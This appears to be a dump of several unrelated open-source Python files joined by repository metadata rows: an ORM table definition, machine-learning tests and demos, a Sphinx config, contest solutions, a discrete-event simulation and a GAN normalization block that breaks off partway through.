dogmaLocation.UnloadChargeToContainer(shipID, item.itemID, (shipID,), const.flagCargo)
return
invCtrl.ShipCargo(util.GetActiveShip()).OnDropData(nodes)
CargoSlots.OnDropData(self, dragObj, nodes)
def OnClick(self, *args):
uicore.cmd.OpenCargoHoldOfActiveShip()
def UpdateCargoSpace(self):
typeID = self.controller.GetGhostFittedTypeID()
fittingChanges = FittingStatsChanges(typeID)
xtraCargoSpace = fittingChanges.GetExtraCargoSpaceMultiplier()
self.Update(xtraCargoSpace)
| [
"le02005@163.com"
] | le02005@163.com |
7f330b9f70088b20251a7e199f7b97aeee3e03db | 81e302a2fe2035d13710d6aa9b13fb763dcf8fa4 | /chapter4/create_table_02.py | b661782e443bcadfeb96ee328a3d727d0a3d1fd2 | [] | no_license | liuyuzhou/databasesourcecode | 8a76099efc86292b1449c3a84b35ba02398bcbe9 | 1f3ad5f27d194c2aa88fa8cb39c6ae92ee3d1f1f | refs/heads/master | 2021-07-18T06:18:28.538719 | 2021-07-03T01:56:58 | 2021-07-03T01:56:58 | 250,950,207 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 893 | py | from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
# 声明映射
Base = declarative_base()
# 定义Course对象,课程表对象
class Course(Base):
# 表的名字
__tablename__ = 'course'
id = Column(Integer, primary_key=True)
course_name = Column(String(20), default=None, nullable=False, comment='课程名称')
teacher_name = Column(String(20), default=None, nullable=False, comment='任课老师')
class_times = Column(Integer, default=0, nullable=False, comment='课时')
# 定义__repr__函数,返回一个可以用来表示对象的可打印字符串
def __repr__(self):
c_name = self.course_name
t_name = self.teacher_name
c_times = self.class_times
return f"Course:(course_name={c_name}, teacher_name={t_name}, class_times={c_times})"
| [
"jxgzyuzhouliu@163.com"
] | jxgzyuzhouliu@163.com |
829ec35d9450bf7dddf39940d17e80553d22d4b8 | fd529ba6ade52cd2a3dab94da01252d7ea90398d | /zerojudge/b130.py | aed6f2b48f8d15ee266fb51fd69118bdc7533a8d | [] | no_license | fjfhfjfjgishbrk/AE401-Python | 4a984deb0281542c205d72695285b35c7413338f | ee80fa4588b127cff2402fd81e732ede28a66411 | refs/heads/master | 2022-06-13T13:49:39.875567 | 2022-05-28T12:40:51 | 2022-05-28T12:40:51 | 251,178,163 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 27 11:16 2020
@author: fdbfvuie
"""
while 1:
try:
input()
a = [int(i) for i in input().split()]
a = list(dict.fromkeys(a))
a.sort()
print(len(a))
print(" ".join([str(i) for i in a]))
except:
break | [
"59891511+fjfhfjfjgishbrk@users.noreply.github.com"
] | 59891511+fjfhfjfjgishbrk@users.noreply.github.com |
b8abb10ab99545daf4c9bf1ff199c941fd73e82e | 6cd3de9d6aa0c52602010aa857966d5dc4d57442 | /_unittests/ut_testing/data/plot_anomaly_comparison.py | 81f4f31d3c39d1702e592d94d0ac07921367ed62 | [
"MIT"
] | permissive | xadupre/mlprodict | 2307ca96eafeeafff08d5322184399bb5dc1c37e | f82c8a26a60104948c67849b1c4af95ca812c153 | refs/heads/master | 2022-12-10T18:50:36.953032 | 2020-09-03T08:53:58 | 2020-09-03T08:53:58 | 292,824,744 | 1 | 0 | NOASSERTION | 2020-09-04T10:56:45 | 2020-09-04T10:56:44 | null | UTF-8 | Python | false | false | 3,372 | py | import time
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from sklearn import svm
from sklearn.datasets import make_moons, make_blobs
from sklearn.covariance import EllipticEnvelope
from sklearn.ensemble import IsolationForest
from sklearn.neighbors import LocalOutlierFactor
matplotlib.rcParams['contour.negative_linestyle'] = 'solid'
# Example settings
n_samples = 300
outliers_fraction = 0.15
n_outliers = int(outliers_fraction * n_samples)
n_inliers = n_samples - n_outliers
# define outlier/anomaly detection methods to be compared
anomaly_algorithms = [
("Robust covariance", EllipticEnvelope(contamination=outliers_fraction)),
("One-Class SVM", svm.OneClassSVM(nu=outliers_fraction, kernel="rbf",
gamma=0.1)),
("Isolation Forest", IsolationForest(contamination=outliers_fraction,
random_state=42)),
("Local Outlier Factor", LocalOutlierFactor(
n_neighbors=35, contamination=outliers_fraction))]
# Define datasets
blobs_params = dict(random_state=0, n_samples=n_inliers, n_features=2)
datasets = [
make_blobs(centers=[[0, 0], [0, 0]], cluster_std=0.5,
**blobs_params)[0],
make_blobs(centers=[[2, 2], [-2, -2]], cluster_std=[0.5, 0.5],
**blobs_params)[0],
make_blobs(centers=[[2, 2], [-2, -2]], cluster_std=[1.5, .3],
**blobs_params)[0],
4. * (make_moons(n_samples=n_samples, noise=.05, random_state=0)[0] -
np.array([0.5, 0.25])),
14. * (np.random.RandomState(42).rand(n_samples, 2) - 0.5)] # pylint: disable=E1101
# Compare given classifiers under given settings
xx, yy = np.meshgrid(np.linspace(-7, 7, 150),
np.linspace(-7, 7, 150))
plt.figure(figsize=(len(anomaly_algorithms) * 2 + 3, 12.5))
plt.subplots_adjust(left=.02, right=.98, bottom=.001, top=.96, wspace=.05,
hspace=.01)
plot_num = 1
rng = np.random.RandomState(42) # pylint: disable=E1101
for i_dataset, X in enumerate(datasets):
# Add outliers
X = np.concatenate([X, rng.uniform(low=-6, high=6,
size=(n_outliers, 2))], axis=0)
for name, algorithm in anomaly_algorithms:
t0 = time.time()
algorithm.fit(X)
t1 = time.time()
plt.subplot(len(datasets), len(anomaly_algorithms), plot_num)
if i_dataset == 0:
plt.title(name, size=18)
# fit the data and tag outliers
if name == "Local Outlier Factor":
y_pred = algorithm.fit_predict(X)
else:
y_pred = algorithm.fit(X).predict(X)
# plot the levels lines and the points
if name != "Local Outlier Factor": # LOF does not implement predict
Z = algorithm.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
plt.contour(xx, yy, Z, levels=[0], linewidths=2, colors='black')
colors = np.array(['#377eb8', '#ff7f00'])
plt.scatter(X[:, 0], X[:, 1], s=10, color=colors[(y_pred + 1) // 2])
plt.xlim(-7, 7)
plt.ylim(-7, 7)
plt.xticks(())
plt.yticks(())
plt.text(.99, .01, ('%.2fs' % (t1 - t0)).lstrip('0'),
transform=plt.gca().transAxes, size=15,
horizontalalignment='right')
plot_num += 1
plt.show()
| [
"xavier.dupre@gmail.com"
] | xavier.dupre@gmail.com |
a756e899283617e6565cb60bca961f619d739868 | e95f65f1e320e56306c4442329b756fdd6ed00fa | /docs/conf.py | 895973e0dc0a1a87a40edc0bfeedfb11f8ec6bf3 | [
"Apache-2.0",
"MIT"
] | permissive | 0xflotus/CUP | 3a808248126a9ef8d3436a1aadf2384fcb869acb | 5e4330cb2e4ccdc67ad94f0084e745eed6f96d6b | refs/heads/master | 2020-03-31T06:08:29.823081 | 2018-09-30T13:32:23 | 2018-09-30T13:32:23 | 151,969,632 | 0 | 0 | NOASSERTION | 2018-10-07T17:56:57 | 2018-10-07T17:56:57 | null | UTF-8 | Python | false | false | 5,882 | py | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, u'/Users/baidu/baidu/code/open-source/python/cup_on_github/cup')
# -- Project information -----------------------------------------------------
project = u'cup'
copyright = u'2018, CUP-DEV'
author = u'CUP-DEV'
# The short X.Y version
version = u'1.7'
# The full version, including alpha/beta/rc tags
release = u'1.7.0'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
'sphinx.ext.todo',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'en'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
html_theme_options = {
'canonical_url': '',
'analytics_id': '',
'logo_only': False,
'display_version': True,
'prev_next_buttons_location': 'bottom',
'style_external_links': False,
# 'vcs_pageview_mode': '',
# Toc options
'collapse_navigation': True,
'sticky_navigation': True,
'navigation_depth': 4,
'includehidden': True,
'titles_only': False
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'cupdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'cup.tex', u'cup Documentation',
u'Author', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'cup', u'cup Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'cup', u'cup Documentation',
author, 'cup', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# -- Extension configuration -------------------------------------------------
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
| [
"mythmgn@gmail.com"
] | mythmgn@gmail.com |
a1605ab46f979a8f2dccfce926267377f4662068 | 3670f46666214ef5e1ce6765e47b24758f3614a9 | /oneflow/python/test/ops/test_summary.py | abfbb915308413ee0f84e72659ac02d44f959708 | [
"Apache-2.0"
] | permissive | ashing-zhang/oneflow | 0b8bb478ccd6cabea2dca0864defddab231919bf | 70db228a4d361c916f8f8d85e908795b479e5d20 | refs/heads/master | 2022-12-14T21:13:46.752535 | 2020-09-07T03:08:52 | 2020-09-07T03:08:52 | 293,535,931 | 1 | 0 | Apache-2.0 | 2020-09-07T13:28:25 | 2020-09-07T13:28:24 | null | UTF-8 | Python | false | false | 6,006 | py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import numpy as np
import tensorflow as tf
import oneflow as flow
from collections import OrderedDict
import cv2
import time
from test_util import GenArgList
def _read_images_by_cv(image_files):
images = [
cv2.cvtColor(cv2.imread(image_file), cv2.COLOR_BGR2RGB).astype(np.uint8)
for image_file in image_files
]
return [cv2.resize(image, (512, 512)) for image in images]
def summary_demo():
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float)
func_config.default_logical_view(flow.scope.mirrored_view())
logdir = "/oneflow/log"
@flow.global_function(function_config=func_config)
def CreateWriter():
flow.summary.create_summary_writer(logdir)
@flow.global_function(function_config=func_config)
def ScalarJob(
value: flow.typing.ListNumpy.Placeholder((1,), dtype=flow.float),
step: flow.typing.ListNumpy.Placeholder((1,), dtype=flow.int64),
tag: flow.typing.ListNumpy.Placeholder((1000,), dtype=flow.int8),
):
flow.summary.scalar(value, step, tag)
@flow.global_function(function_config=func_config)
def HistogramJob(
value: flow.typing.ListNumpy.Placeholder((200, 200, 200), dtype=flow.float),
step: flow.typing.ListNumpy.Placeholder((1,), dtype=flow.int64),
tag: flow.typing.ListNumpy.Placeholder((9,), dtype=flow.int8),
):
flow.summary.histogram(value, step, tag)
@flow.global_function(function_config=func_config)
def PbJob(
value: flow.typing.ListNumpy.Placeholder((1500,), dtype=flow.int8),
step: flow.typing.ListNumpy.Placeholder((1,), dtype=flow.int64),
):
flow.summary.pb(value, step=step)
@flow.global_function(function_config=func_config)
def ImageJob(
value: flow.typing.ListNumpy.Placeholder(
shape=(100, 2000, 2000, 4), dtype=flow.uint8
),
step: flow.typing.ListNumpy.Placeholder((1,), dtype=flow.int64),
tag: flow.typing.ListNumpy.Placeholder((10,), dtype=flow.int8),
):
flow.summary.image(value, step=step, tag=tag)
@flow.global_function(function_config=func_config)
def FlushJob():
flow.summary.flush_summary_writer()
CreateWriter()
projecotr = flow.summary.Projector(logdir)
projecotr.create_embedding_projector()
projecotr.create_exception_projector()
hparams = {
flow.summary.HParam("learning_rate", flow.summary.RealRange(1e-2, 1e-1)): 0.02,
flow.summary.HParam("dense_layers", flow.summary.IntegerRange(2, 7)): 5,
flow.summary.HParam(
"optimizer", flow.summary.ValueSet(["adam", "sgd"])
): "adam",
flow.summary.HParam("accuracy", flow.summary.RealRange(1e-2, 1e-1)): 0.001,
flow.summary.HParam("magic", flow.summary.ValueSet([False, True])): True,
flow.summary.Metric("loss", float): 0.02,
"dropout": 0.6,
}
for i in range(200):
t = ["vgg16", "resnet50", "mask-rcnn", "yolov3"]
pb = flow.summary.text(t)
value = np.fromstring(str(pb), dtype=np.int8)
step = np.array([i], dtype=np.int64)
PbJob([value], [step])
pb2 = flow.summary.hparams(hparams)
value = np.fromstring(str(pb2), dtype=np.int8)
step = np.array([i], dtype=np.int64)
PbJob([value], [step])
for idx in range(10):
value = np.array([idx], dtype=np.float32)
step = np.array([idx], dtype=np.int64)
tag = np.fromstring("scalar", dtype=np.int8)
ScalarJob([value], [step], [tag])
value = np.array(
[
[[1, 2, 3, 0], [0, 2, 3, 1], [2, 3, 4, 1]],
[[1, 0, 2, 0], [2, 1, 2, 0], [2, 1, 1, 1]],
],
dtype=np.float64,
)
for idx in range(1):
value = np.random.rand(100, 100, 100).astype(np.float32)
step = np.array([idx], dtype=np.int64)
tag = np.fromstring("histogram", dtype=np.int8)
HistogramJob([value], [step], [tag])
value_ = np.random.rand(10, 10, 10).astype(np.float32)
label = (np.random.rand(10) * 10).astype(np.int64)
x = (np.random.rand(10, 10, 10) * 255).astype(np.uint8)
sample_name = "sample"
sample_type = "image"
step = 1
tag_exception = "exception_projector"
tag_embedding = "embedding_projector"
projecotr.exception_projector(
value=value,
tag=tag_exception,
step=step,
sample_name=sample_name,
sample_type=sample_type,
x=x,
)
projecotr.embedding_projector(
value=value,
label=label,
tag=tag_embedding,
step=step,
sample_name=sample_name,
sample_type=sample_type,
x=x,
)
image1_path = "~/oneflow/image1"
image2_path = "~/oneflow/image2"
image_files = [
image1_path,
image2_path,
]
images = _read_images_by_cv(image_files)
images = np.array(images, dtype=np.uint8)
imageRed = np.ones([512, 512, 3]).astype(np.uint8)
Red = np.array([0, 255, 255], dtype=np.uint8)
imageNew = np.multiply(imageRed, Red)
imageNew = np.expand_dims(imageNew, axis=0)
images = np.concatenate((images, imageNew), axis=0)
step = np.array([1], dtype=np.int64)
tag = np.fromstring("image", dtype=np.int8)
ImageJob([images], [step], [tag])
graph = flow.summary.Graph(logdir)
graph.write_structure_graph()
| [
"noreply@github.com"
] | ashing-zhang.noreply@github.com |
946f16bbbb68b0e88e2045b3bbb65935e136bcb4 | 169e75df163bb311198562d286d37aad14677101 | /tensorflow/tensorflow/contrib/distributions/python/kernel_tests/bijectors/invert_test.py | 8b14c8327f08902044f50483f9f8dfe67b58cd70 | [
"Apache-2.0"
] | permissive | zylo117/tensorflow-gpu-macosx | e553d17b769c67dfda0440df8ac1314405e4a10a | 181bc2b37aa8a3eeb11a942d8f330b04abc804b3 | refs/heads/master | 2022-10-19T21:35:18.148271 | 2020-10-15T02:33:20 | 2020-10-15T02:33:20 | 134,240,831 | 116 | 26 | Apache-2.0 | 2022-10-04T23:36:22 | 2018-05-21T08:29:12 | C++ | UTF-8 | Python | false | false | 3,534 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Bijector."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.distributions.python.ops import bijectors
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops.distributions import gamma as gamma_lib
from tensorflow.python.ops.distributions import transformed_distribution as transformed_distribution_lib
from tensorflow.python.ops.distributions.bijector_test_util import assert_scalar_congruency
from tensorflow.python.platform import test
class InvertBijectorTest(test.TestCase):
"""Tests the correctness of the Y = Invert(bij) transformation."""
def testBijector(self):
with self.test_session():
for fwd in [
bijectors.Identity(),
bijectors.Exp(),
bijectors.Affine(shift=[0., 1.], scale_diag=[2., 3.]),
bijectors.Softplus(),
bijectors.SoftmaxCentered(),
]:
rev = bijectors.Invert(fwd)
self.assertEqual("_".join(["invert", fwd.name]), rev.name)
x = [[[1., 2.],
[2., 3.]]]
self.assertAllClose(fwd.inverse(x).eval(), rev.forward(x).eval())
self.assertAllClose(fwd.forward(x).eval(), rev.inverse(x).eval())
self.assertAllClose(
fwd.forward_log_det_jacobian(x, event_ndims=1).eval(),
rev.inverse_log_det_jacobian(x, event_ndims=1).eval())
self.assertAllClose(
fwd.inverse_log_det_jacobian(x, event_ndims=1).eval(),
rev.forward_log_det_jacobian(x, event_ndims=1).eval())
def testScalarCongruency(self):
with self.test_session():
bijector = bijectors.Invert(bijectors.Exp())
assert_scalar_congruency(
bijector, lower_x=1e-3, upper_x=1.5, rtol=0.05)
def testShapeGetters(self):
with self.test_session():
bijector = bijectors.Invert(bijectors.SoftmaxCentered(validate_args=True))
x = tensor_shape.TensorShape([2])
y = tensor_shape.TensorShape([1])
self.assertAllEqual(y, bijector.forward_event_shape(x))
self.assertAllEqual(
y.as_list(),
bijector.forward_event_shape_tensor(x.as_list()).eval())
self.assertAllEqual(x, bijector.inverse_event_shape(y))
self.assertAllEqual(
x.as_list(),
bijector.inverse_event_shape_tensor(y.as_list()).eval())
def testDocstringExample(self):
with self.test_session():
exp_gamma_distribution = (
transformed_distribution_lib.TransformedDistribution(
distribution=gamma_lib.Gamma(concentration=1., rate=2.),
bijector=bijectors.Invert(bijectors.Exp())))
self.assertAllEqual(
[], array_ops.shape(exp_gamma_distribution.sample()).eval())
if __name__ == "__main__":
test.main()
| [
"thomas.warfel@pnnl.gov"
] | thomas.warfel@pnnl.gov |
dc95b43f050b1a562cd5b337aa8b009fa051bb29 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_43/223.py | e3f471696da9db5f1e2d23a13dbcff77e5f7668f | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,509 | py | #!/usr/bin/python
import os
import sys
import math
def read_input_NN(fn =""):
fh = open(fn, "r")
lines = map(lambda x: x.strip(), fh.readlines())
fh.close()
goog_N = map(int, lines[0].split())[0]
l_dict = lines[1:]
return(l_dict)
def sum_square(str1="123"):
sum1 = 0
for i in str1:
sum1 += int(i)*int(i)
return(sum1)
def tobase(base,number):
global tb
#http://myphotoblogbeta.blogspot.com/2007/07/python-convert-to-and-from-base-b.html
def tb(b,n,result=''):
if n == 0: return result
else: return tb(b,n/b,str(n%b)+result)
if type(base) != type(1):
raise TypeError, 'invalid base for tobase()'
if base <= 0:
raise ValueError, 'invalid base for tobase(): %s' % base
if type(number) != type(1) and type(number) != type(1L):
raise TypeError, 'tobase() of non-integer'
if number == 0:
return '0'
if number > 0:
return tb(base, number)
if number < 0:
return '-' + tb(base, -1*number)
def determine_happy(base1 = 10,num1 = "83"):
last_num="0"
d_found = {}
num1 = tobase(base1,int(num1))
#print num1
while(num1!="1"):
num1 = tobase(base1,sum_square(num1))
#print num1
if last_num == num1:
break
if num1 == "1":
break
last_num = num1
if num1 in d_found.keys():
break
d_found[num1]=1
if num1 == "1":
return(1)
return(0)
def find_smallest(l2=[1,2,3]):
i_c=1
l2 = filter(lambda x: x!=2, l2)
if len(l2) == 0:
return(1)
for i in xrange(2,1000000):
#print i
#print l2
i_c=i
i_s = str(i)
is_happy = map(lambda x: determine_happy(x,str(i)),l2)
#print is_happy
prod = 1
for j in is_happy:
prod *= j
if prod == 1:
break
return(i_c)
def small_base(str1="123"):
l2 = list(str1)
#print l2
set1 = set(l2)
d_map={}
dec_list = [1,0]+range(2,100)
dec_i = 0
for i in l2:
if i not in d_map.keys():
d_map[i]=dec_list[dec_i]
dec_i+=1
#print d_map
l2 = map(lambda x: d_map[x],l2)
#print l2
base1 = max([2,len(set1)])
#print base1
num1 = 0
for (ctr,i) in enumerate(l2[::-1]):
num1+=math.pow(base1,ctr)*i
return(num1)
def qa(fn="sample"):
l1 = read_input_NN(fn)
#print l1
return(l1)
#l1 = qa(fn="A-large.in.txt")
l1 = qa(fn="A-small-attempt0-1.in.txt")
#print l1
fh = open("out.txt","w")
for (ctr,sol) in enumerate(l1):
print >> fh, "Case #"+str(ctr+1)+": "+str(int(small_base(sol)+.001))
#print small_base(sol)
fh.close()
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
aceb95c7fc2ae2e177bc60e8453b07a43eacbd83 | 2871a5c3d1e885ee72332dbd8ff2c015dbcb1200 | /o2despy/demos/demo2/demo2.py | 46c6865ce1c61201973f24e6aaf3a88ccd687044 | [
"MIT"
] | permissive | huawei-noah/noah-research | 297476299ad040552e44656541858145de72d141 | 82c49c36b76987a46dec8479793f7cf0150839c6 | refs/heads/master | 2023-08-16T19:29:25.439701 | 2023-08-14T03:11:49 | 2023-08-14T03:11:49 | 272,853,727 | 816 | 171 | null | 2023-09-12T01:28:36 | 2020-06-17T01:53:20 | Python | UTF-8 | Python | false | false | 2,379 | py | # Copyright (C) 2022. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import datetime
import random
from datetime import timedelta
from o2despy.sandbox import Sandbox
class BirthDeath(Sandbox):
def __init__(self, hourly_birth_rate, hourly_death_rate, seed=0):
super().__init__(seed=seed)
self.hourly_birth_rate = hourly_birth_rate
self.hourly_death_rate = hourly_death_rate
self.population = self.add_hour_counter()
# self.schedule([self.birth], timedelta(seconds=0))
self.schedule([self.birth])
def birth(self):
self.population.observe_change(1)
print("{0}\tBirth (Population: #{1}!)".format(self.clock_time, self.population.last_count))
self.schedule([self.birth], timedelta(hours=round(random.expovariate(self.hourly_birth_rate), 2)))
self.schedule([self.death], timedelta(hours=round(random.expovariate(self.hourly_death_rate), 2)))
def death(self):
self.population.observe_change(-1)
print("{0}\tDeath (Population: #{1}!)".format(self.clock_time, self.population.last_count))
if __name__ == '__main__':
# Demo 2
print("Demo 2 - Birth Death Process")
sim = BirthDeath(20, 1, seed=1)
sim.warmup(period=datetime.timedelta(hours=24))
sim.run(duration=datetime.timedelta(hours=30))
| [
"noreply@github.com"
] | huawei-noah.noreply@github.com |
68d4ffaec3b27b725bd05a50989f1f215328c4b8 | 5f69a6549b8d5e417553d910622e6855b2ae679b | /projects/python/simulation/synthetic_multi_view_facial_image_generation/algorithm/Rotate_and_Render/models/networks/architecture.py | 123004ef5239c4420d42105dbf720eb77c14adc4 | [
"Apache-2.0",
"CC-BY-4.0",
"MIT"
] | permissive | opendr-eu/opendr | 822219f709613d77c5eb62c5d02808d344239835 | b3d6ce670cdf63469fc5766630eb295d67b3d788 | refs/heads/master | 2023-08-31T07:02:36.375231 | 2023-08-29T06:39:51 | 2023-08-29T06:39:51 | 293,755,225 | 535 | 82 | Apache-2.0 | 2023-09-13T16:53:34 | 2020-09-08T08:55:04 | Python | UTF-8 | Python | false | false | 7,410 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
import torch.nn.utils.spectral_norm as spectral_norm
from .normalization import SPADE
from ...util import util
# ResNet block that uses SPADE.
# It differs from the ResNet block of pix2pixHD in that
# it takes in the segmentation map as input, learns the skip connection if necessary,
# and applies normalization first and then convolution.
# This architecture seemed like a standard architecture for unconditional or
# class-conditional GAN architecture using residual block.
# The code was inspired from https://github.com/LMescheder/GAN_stability.
class SPADEResnetBlock(nn.Module):
def __init__(self, fin, fout, opt):
super().__init__()
# Attributes
self.learned_shortcut = (fin != fout)
fmiddle = min(fin, fout)
# create conv layers
self.conv_0 = nn.Conv2d(fin, fmiddle, kernel_size=3, padding=1)
self.conv_1 = nn.Conv2d(fmiddle, fout, kernel_size=3, padding=1)
if self.learned_shortcut:
self.conv_s = nn.Conv2d(fin, fout, kernel_size=1, bias=False)
# apply spectral norm if specified
if 'spectral' in opt.norm_G:
self.conv_0 = spectral_norm(self.conv_0)
self.conv_1 = spectral_norm(self.conv_1)
if self.learned_shortcut:
self.conv_s = spectral_norm(self.conv_s)
# define normalization layers
spade_config_str = opt.norm_G.replace('spectral', '')
self.norm_0 = SPADE(spade_config_str, fmiddle, opt.semantic_nc)
self.norm_1 = SPADE(spade_config_str, fout, opt.semantic_nc)
if self.learned_shortcut:
self.norm_s = SPADE(spade_config_str, fout, opt.semantic_nc)
# note the resnet block with SPADE also takes in |seg|,
# the semantic segmentation map as input
def _forward(self, x, seg):
x_s = self.shortcut(x, seg)
dx = self.conv_0(self.actvn(self.norm_0(x, seg)))
dx = self.conv_1(self.actvn(self.norm_1(dx, seg)))
out = x_s + dx
return out
def forward(self, x, seg):
if self.learned_shortcut:
x_s = self.norm_s(self.conv_s(x), seg)
else:
x_s = x
dx = self.actvn(self.norm_0(self.conv_0(x), seg))
dx = self.actvn(self.norm_1(self.conv_1(dx), seg))
out = x_s + dx
return out
def shortcut(self, x, seg):
if self.learned_shortcut:
x_s = self.conv_s(self.norm_s(x, seg))
else:
x_s = x
return x_s
def actvn(self, x):
return F.leaky_relu(x, 2e-1)
# try to put SPADE into pix2pixHD middle layers
class ResnetSPADEBlock(nn.Module):
def __init__(self, dim, semantic_nc, kernel_size=3):
super().__init__()
norm_G = 'spectralspadesyncbatch3x3'
pw = (kernel_size - 1) // 2
self.conv_0 = nn.Conv2d(dim, dim, kernel_size=kernel_size)
self.conv_1 = nn.Conv2d(dim, dim, kernel_size=kernel_size)
self.padding = nn.ReflectionPad2d(pw)
if 'spectral' in norm_G:
self.add_module('conv_block1', spectral_norm(self.conv_0))
self.add_module('conv_block4', spectral_norm(self.conv_1))
# define normalization layers
spade_config_str = norm_G.replace('spectral', '')
self.norm_0 = SPADE(spade_config_str, dim, semantic_nc)
self.norm_1 = SPADE(spade_config_str, dim, semantic_nc)
def forward(self, x, seg):
dx = self.padding(x)
dx = self.activation(self.norm_0(self.conv_0(dx), seg))
dx = self.padding(dx)
